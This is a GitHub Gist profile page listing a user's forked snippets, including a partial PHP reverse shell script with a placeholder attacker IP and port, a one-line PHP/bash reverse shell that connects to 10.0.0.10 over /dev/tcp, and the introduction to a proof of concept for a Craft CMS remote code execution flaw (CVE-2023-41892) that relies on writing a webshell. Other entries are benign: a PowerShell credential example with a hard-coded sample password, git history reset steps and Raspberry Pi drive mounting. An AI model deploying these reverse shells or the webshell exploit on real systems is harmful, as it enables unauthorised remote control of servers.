Skip to content

Instantly share code, notes, and snippets.

View mano8's full-sized avatar

Eli Serra mano8

29 followers · 28 following
  • Almeria
View GitHub Profile
@mano8
mano8 / reverse-shell.php
Created April 22, 2024 16:44 — forked from noobpk/reverse-shell.php
Php Reverse Shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.12'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
@mano8
mano8 / CreateAutomationPSCredential.ps1
Created April 14, 2024 22:28 — forked from bdanse/CreateAutomationPSCredential.ps1
Example for creating Automation PSCredential
#Create a secure string for the password
$SecureStringPassword = ConvertTo-SecureString "SuperSecretPassw0rd" -AsPlainText -Force
#Create a PSCredential object
$PSCredential = New-Object System.Management.Automation.PSCredential('domain\myusername', $SecureStringPassword)
#Write PSCredential object to an Azure Automation account
New-AzureRmAutomationCredential -Name 'MyCredentialAssetName' -Value $PSCredential
#Retrieve PSCredential object from within a runbook of DSC compilation job
@mano8
mano8 / shell.php
Created April 13, 2024 16:41 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@mano8
mano8 / CVE-2023-41892-POC.md
Created March 12, 2024 12:28 — forked from to016/CVE-2023-41892-POC.md
CVE-2023-41892 (Craft CMS Remote Code Execution) - POC

This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).

Overview

CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

POC

This POC is depending on writing webshell, so finding a suitable folder with writable permission is necessary.

@mano8
mano8 / repo-reset.md
Created May 24, 2023 08:03 — forked from heiswayi/repo-reset.md
GitHub - Delete commits history with git commands

First Method

Deleting the .git folder may cause problems in our git repository. If we want to delete all of our commits history, but keep the code in its current state, try this:

# Check out to a temporary branch:
git checkout --orphan TEMP_BRANCH

# Add all the files:
git add -A
@mano8
mano8 / pi_mount_usb.md
Created February 9, 2020 09:47 — forked from etes/pi_mount_usb.md
How to setup mount / auto-mount USB Hard Drive on Raspberry Pi

How to setup mount / auto-mount USB Hard Drive on Raspberry Pi

Follow the simple steps in the order mentioned below to have your USB drive mounted on your Raspberry Pi every time you boot it.

These steps are required especially if your are setting up a Samba share, or a 24x7 torrent downloader, or alike where your Raspberry Pi must have your external storage already mounted and ready for access by the services / daemons.

Step 0. Plug in your USB HDD / Drive to Raspberry Pi If you are using a NTFS formatted drive, install the following